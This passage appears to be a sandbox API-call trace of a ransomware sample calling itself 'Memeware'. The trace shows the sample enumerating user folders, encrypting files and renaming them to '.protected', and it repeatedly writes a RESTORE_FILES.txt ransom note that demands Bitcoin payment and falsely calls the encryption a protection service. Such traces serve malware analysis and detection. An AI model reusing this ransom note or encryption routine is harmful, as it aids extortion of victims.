lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="Program Files") returned -1 [0095.444] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="Program Files (x86)") 
returned -1 [0095.444] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="$Recycle.bin") returned 1 [0095.444] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="System Volume Information") returned -1 [0095.444] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Searches\\Indexed Locations.search-ms") returned 57 [0095.444] StrStrIW (lpFirst="Indexed Locations.search-ms", lpSrch=".protected") returned 0x0 [0095.444] lstrcmpW (lpString1="Indexed Locations.search-ms", lpString2="RESTORE_FILES.txt") returned -1 [0095.444] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0095.444] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0095.444] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Searches\\Indexed Locations.search-ms" (normalized: "c:\\users\\default\\searches\\indexed locations.search-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.444] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0095.444] FindClose (in: hFindFile=0x47b990 | out: hFindFile=0x47b990) returned 1 [0095.444] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Searches\\RESTORE_FILES.txt") returned 47 [0095.444] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Searches\\RESTORE_FILES.txt" (normalized: "c:\\users\\default\\searches\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0095.445] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0095.445] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0095.446] lstrlenA 
(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0095.446] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0095.446] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0095.446] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0095.446] CloseHandle (hObject=0xa4) returned 1 [0095.446] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0095.446] lstrcmpiW (lpString1="SendTo", lpString2="Windows") returned -1 [0095.446] lstrcmpiW (lpString1="SendTo", lpString2="Program Files") returned 1 [0095.446] lstrcmpiW (lpString1="SendTo", lpString2="Program Files (x86)") returned 1 [0095.446] lstrcmpiW (lpString1="SendTo", lpString2="$Recycle.bin") returned 1 [0095.446] lstrcmpiW (lpString1="SendTo", lpString2="System Volume Information") returned -1 
[0095.446] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\SendTo") returned 27 [0095.446] lstrcmpW (lpString1="SendTo", lpString2=".") returned 1 [0095.446] lstrcmpW (lpString1="SendTo", lpString2="..") returned 1 [0095.446] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\SendTo\\*") returned 29 [0095.446] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\SendTo\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0xffffffff [0095.446] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0095.446] lstrcmpiW (lpString1="Start Menu", lpString2="Windows") returned -1 [0095.446] lstrcmpiW (lpString1="Start Menu", lpString2="Program Files") returned 1 [0095.446] lstrcmpiW (lpString1="Start Menu", lpString2="Program Files (x86)") returned 1 [0095.446] lstrcmpiW (lpString1="Start Menu", lpString2="$Recycle.bin") returned 1 [0095.446] lstrcmpiW (lpString1="Start Menu", lpString2="System Volume Information") returned -1 [0095.446] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Start Menu") returned 31 [0095.446] lstrcmpW (lpString1="Start Menu", lpString2=".") returned 1 [0095.446] lstrcmpW (lpString1="Start Menu", lpString2="..") returned 1 [0095.446] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\Start Menu\\*") returned 33 [0095.446] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Start Menu\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0xffffffff [0095.446] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0095.446] lstrcmpiW (lpString1="Templates", lpString2="Windows") returned -1 [0095.447] lstrcmpiW (lpString1="Templates", lpString2="Program Files") 
returned 1 [0095.447] lstrcmpiW (lpString1="Templates", lpString2="Program Files (x86)") returned 1 [0095.447] lstrcmpiW (lpString1="Templates", lpString2="$Recycle.bin") returned 1 [0095.447] lstrcmpiW (lpString1="Templates", lpString2="System Volume Information") returned 1 [0095.447] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Templates") returned 30 [0095.447] lstrcmpW (lpString1="Templates", lpString2=".") returned 1 [0095.447] lstrcmpW (lpString1="Templates", lpString2="..") returned 1 [0095.447] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\Templates\\*") returned 32 [0095.447] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Templates\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0xffffffff [0095.447] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0095.447] lstrcmpiW (lpString1="Videos", lpString2="Windows") returned -1 [0095.447] lstrcmpiW (lpString1="Videos", lpString2="Program Files") returned 1 [0095.447] lstrcmpiW (lpString1="Videos", lpString2="Program Files (x86)") returned 1 [0095.447] lstrcmpiW (lpString1="Videos", lpString2="$Recycle.bin") returned 1 [0095.447] lstrcmpiW (lpString1="Videos", lpString2="System Volume Information") returned 1 [0095.447] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Videos") returned 27 [0095.447] lstrcmpW (lpString1="Videos", lpString2=".") returned 1 [0095.447] lstrcmpW (lpString1="Videos", lpString2="..") returned 1 [0095.447] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\Videos\\*") returned 29 [0095.447] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Videos\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x47b990 [0095.447] lstrcmpiW 
(lpString1=".", lpString2="Windows") returned -1 [0095.447] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0095.447] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0095.447] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0095.447] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0095.447] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Videos\\.") returned 29 [0095.447] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0095.447] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0095.447] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0095.447] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0095.447] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0095.448] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Videos\\." 
(normalized: "c:\\users\\default\\videos\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.448] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0095.448] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0095.448] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0095.448] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0095.448] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0095.448] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0095.448] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Videos\\..") returned 30 [0095.448] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0095.448] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0095.448] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0095.448] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0095.448] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0095.448] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0095.448] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Videos\\.." 
(normalized: "c:\\users\\default"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.448] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0095.448] lstrcmpiW (lpString1="desktop.ini", lpString2="Windows") returned -1 [0095.448] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files") returned -1 [0095.448] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files (x86)") returned -1 [0095.448] lstrcmpiW (lpString1="desktop.ini", lpString2="$Recycle.bin") returned 1 [0095.448] lstrcmpiW (lpString1="desktop.ini", lpString2="System Volume Information") returned -1 [0095.448] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Videos\\desktop.ini") returned 39 [0095.448] StrStrIW (lpFirst="desktop.ini", lpSrch=".protected") returned 0x0 [0095.448] lstrcmpW (lpString1="desktop.ini", lpString2="RESTORE_FILES.txt") returned -1 [0095.448] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0095.448] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0095.448] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Videos\\desktop.ini" (normalized: "c:\\users\\default\\videos\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0095.449] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Videos\\desktop.ini") returned 39 [0095.449] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0095.449] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Videos\\desktop.ini") returned 39 [0095.449] StrStrW (lpFirst="desktop.ini", 
lpSrch=".rar") returned 0x0 [0095.449] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Videos\\desktop.ini") returned 39 [0095.449] StrStrW (lpFirst="desktop.ini", lpSrch=".zip") returned 0x0 [0095.449] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x1f8, lpOverlapped=0x0) returned 1 [0095.449] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffffe08, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.449] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x1f8, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x1f8, lpOverlapped=0x0) returned 1 [0095.450] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.450] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0095.450] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0095.450] CloseHandle (hObject=0xb4) returned 1 [0095.450] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Videos\\desktop.ini.protected") returned 49 [0095.450] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Videos\\desktop.ini" (normalized: "c:\\users\\default\\videos\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Videos\\desktop.ini.protected" (normalized: "c:\\users\\default\\videos\\desktop.ini.protected")) returned 1 [0095.450] FindNextFileW (in: hFindFile=0x47b990, 
lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0095.450] FindClose (in: hFindFile=0x47b990 | out: hFindFile=0x47b990) returned 1 [0095.450] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Videos\\RESTORE_FILES.txt") returned 45 [0095.450] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Videos\\RESTORE_FILES.txt" (normalized: "c:\\users\\default\\videos\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0095.451] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0095.451] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0095.451] lstrlenA (lpString="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") returned 684 [0095.451] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0095.451] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0095.451] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, 
lpOverlapped=0x0) returned 1 [0095.451] CloseHandle (hObject=0xa4) returned 1 [0095.452] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0 [0095.452] FindClose (in: hFindFile=0x47b950 | out: hFindFile=0x47b950) returned 1 [0095.452] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\RESTORE_FILES.txt") returned 38 [0095.452] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\RESTORE_FILES.txt" (normalized: "c:\\users\\default\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0095.452] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0095.452] WriteFile (in: hFile=0x104, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f3e4*=0x53d, lpOverlapped=0x0) returned 1 [0095.453] lstrlenA (lpString="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") returned 684 [0095.453] WriteFile (in: hFile=0x104, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f3e4*=0x2ac, lpOverlapped=0x0) returned 1 [0095.453] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0095.453] WriteFile (in: hFile=0x104, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f3e4*=0xb1, 
lpOverlapped=0x0) returned 1 [0095.453] CloseHandle (hObject=0x104) returned 1 [0095.453] FindNextFileW (in: hFindFile=0x47b910, lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 1 [0095.453] lstrcmpiW (lpString1="Default User", lpString2="Windows") returned -1 [0095.453] lstrcmpiW (lpString1="Default User", lpString2="Program Files") returned -1 [0095.453] lstrcmpiW (lpString1="Default User", lpString2="Program Files (x86)") returned -1 [0095.453] lstrcmpiW (lpString1="Default User", lpString2="$Recycle.bin") returned 1 [0095.453] lstrcmpiW (lpString1="Default User", lpString2="System Volume Information") returned -1 [0095.453] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default User") returned 25 [0095.453] lstrcmpW (lpString1="Default User", lpString2=".") returned 1 [0095.453] lstrcmpW (lpString1="Default User", lpString2="..") returned 1 [0095.453] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default User\\*") returned 27 [0095.453] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default User\\*", lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0xffffffff [0095.453] FindNextFileW (in: hFindFile=0x47b910, lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 1 [0095.453] lstrcmpiW (lpString1="desktop.ini", lpString2="Windows") returned -1 [0095.453] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files") returned -1 [0095.453] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files (x86)") returned -1 [0095.453] lstrcmpiW (lpString1="desktop.ini", lpString2="$Recycle.bin") returned 1 [0095.453] lstrcmpiW (lpString1="desktop.ini", lpString2="System Volume Information") returned -1 [0095.453] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\desktop.ini") returned 24 [0095.453] StrStrIW (lpFirst="desktop.ini", lpSrch=".protected") returned 0x0 
[0095.453] lstrcmpW (lpString1="desktop.ini", lpString2="RESTORE_FILES.txt") returned -1 [0095.453] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f60c | out: pbBuffer=0x295f60c) returned 1 [0095.454] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f634*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f634*=0x30) returned 1 [0095.454] CreateFileW (lpFileName="\\\\?\\C:\\Users\\desktop.ini" (normalized: "c:\\users\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0095.454] lstrlenW (lpString="\\\\?\\C:\\Users\\desktop.ini") returned 24 [0095.454] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0095.454] lstrlenW (lpString="\\\\?\\C:\\Users\\desktop.ini") returned 24 [0095.454] StrStrW (lpFirst="desktop.ini", lpSrch=".rar") returned 0x0 [0095.454] lstrlenW (lpString="\\\\?\\C:\\Users\\desktop.ini") returned 24 [0095.454] StrStrW (lpFirst="desktop.ini", lpSrch=".zip") returned 0x0 [0095.454] ReadFile (in: hFile=0x104, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f654, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f654*=0xae, lpOverlapped=0x0) returned 1 [0095.454] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0xffffff52, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.454] WriteFile (in: hFile=0x104, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0xae, lpNumberOfBytesWritten=0x295f654, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f654*=0xae, lpOverlapped=0x0) returned 1 [0095.455] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.455] WriteFile (in: hFile=0x104, lpBuffer=0x295f62c*, nNumberOfBytesToWrite=0x4, 
